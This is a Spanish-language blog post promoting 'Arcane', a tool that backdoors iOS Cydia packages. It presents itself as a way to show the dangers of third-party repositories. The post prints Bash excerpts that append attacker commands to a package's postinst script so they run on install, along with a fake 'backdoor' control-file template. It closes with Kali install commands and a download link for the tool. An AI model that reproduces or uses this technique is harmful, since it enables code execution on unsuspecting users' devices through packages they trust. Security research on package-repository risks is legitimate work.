Arcane - Herramienta para paquetes de iOS de puerta trasera (iPhone ARM)

Arcane es una herramienta de secuencia de comandos simple para realizar una puerta trasera en los paquetes de iOS (iPhone ARM) y crear los recursos necesarios para los repositorios APT.

Fue creado para ayudar a ilustrar por qué los repositorios de Cydia pueden ser peligrosos y qué ataques posteriores a la explotación son posibles desde un dispositivo iOS comprometido.

Cómo funciona la herramienta Arcane para el paquete de iOS de puerta trasera

Es posible proporcionar scripts como parte de un paquete al instalar o eliminar aplicaciones. Los scripts del mantenedor del paquete incluyen los archivos preinst, postinst, prerm, y postrm. Arcane aprovecha el postinstarchivo para ejecutar comandos durante la instalación.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
# The "post-installation" file. This file is generally responsible
# for executing commands on the OS after installing the required
# files. It's utilized by developers to manage and maintain various
# aspects of an installation. Arcane abuses this functionality by
# appending malicious Bash commands to the file.
postinst="$tmp/DEBIAN/postinst";
 
# A function to handle the type of command execution embedded into the
# postinst file.
function inject_backdoor ()
{
    # If --file is used, `cat` the command(s) into the postinst file.
    if [[ "$infile" ]]; then
        cat "$infile" >> "$postinst";
        embed="[$infile]";
    else
        # If no --file, utilize the simple Bash payload, previously
        # defined.
        echo -e "$payload" >> "$postinst";
        embed="generic shell command";
    fi;
    status "embedded $embed into postinst" "error embedding backdoor";
    chmod 0755 "$postinst"
};

El controlarchivo contiene valores que utilizan las herramientas de administración de paquetes al instalar paquetes. Arcano modificará uno existente controlo lo creará.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
# The "control" file template. Most iOS packages will include a
# control file. In the event one is not found, Arcane will use the
# below template. The `$hacker` variable is used here to occupy
# various arbitrary fields.
# https://www.debian.org/doc/manuals/maint-guide/dreq.en.html
controlTemp="Package: com.$hacker.backdoor
Name: $hacker backdoor
Version: 1337
Section: app
Architecture: iphoneos-arm
Description: A backdoored iOS package
Author: $hacker <https://$hacker.github.io/>
Maintainer: $hacker <https://$hacker.github.io/>";
 
...
 
# An `if` statement to check for the control file.
if [[ ! -f "$tmp/DEBIAN/control" ]]; then
    # If no control is detected, create it using the template.
    echo "$controlTemp" > "$tmp/DEBIAN/control";
    status "created control file" "error with control template";
else
    # If a control file exists, Arcane will simply rename the package
    # as it appears in the list of available Cydia applications. This
    # makes the package easier to location in Cydia.
    msg "detected control file" succ;
    sed -i '0,/^Name:.*/s//Name: $hacker backdoor/' "$tmp/DEBIAN/control";
    status "modified control file" "error with control";
fi;

Cómo instalar Arcane Tool en paquetes de iOS de puerta trasera

Recomendado para Kali v2020.3:

1
2
3
4
sudo apt-get update; sudo apt-get install -Vy bzip2 netcat-traditional dpkg coreutils # dependencies
sudo git clone https://github.com/tokyoneon/arcane /opt/arcane
sudo chown $USER:$USER -R /opt/arcane/; cd /opt/arcane
chmod +x arcane.sh;./arcane.sh --help

Puedes descargar Arcane aquí:

Arcane-master.zip

O lea más aquí .

Fuente: https://www.darknet.org.uk/

No olvides Compartir...

Siguenos en twitter: @disoftin - @fredyavila

Arcane - Herramienta para paquetes de iOS de puerta trasera (iPhone ARM)

Cómo funciona la herramienta Arcane para el paquete de iOS de puerta trasera

Cómo instalar Arcane Tool en paquetes de iOS de puerta trasera

Publicado por fredyavila2

Publicar un comentario

0 Comentarios

Visitas al sitio

Más popular

Dorks de carding para inyección SQL

Cómo usar SQLMAP (Nivel principiante)

Credential Stuffing: cómo los ciberdelincuentes roban cuentas y cómo protegerse

Las advertencias del FBI son ciertas: los convertidores de archivos falsos sí propagan malware

Auditorías Web con OWASP ZAP – Introducción y ejemplos de uso

Random Posts

YouTube

Contribuir al blog

Archivo

Tags

Menu Footer Widget

Contact form

Arcane - Herramienta para paquetes de iOS de puerta trasera (iPhone ARM)

Cómo funciona la herramienta Arcane para el paquete de iOS de puerta trasera

Cómo instalar Arcane Tool en paquetes de iOS de puerta trasera

Publicado por fredyavila2

Entradas que pueden interesarte

Publicar un comentario

0 Comentarios

Visitas al sitio

Social Plugin

Más popular

Dorks de carding para inyección SQL

Cómo usar SQLMAP (Nivel principiante)

Credential Stuffing: cómo los ciberdelincuentes roban cuentas y cómo protegerse

Las advertencias del FBI son ciertas: los convertidores de archivos falsos sí propagan malware

Auditorías Web con OWASP ZAP – Introducción y ejemplos de uso

Random Posts

YouTube

Contribuir al blog

Archivo

Tags

Menu Footer Widget

Contact form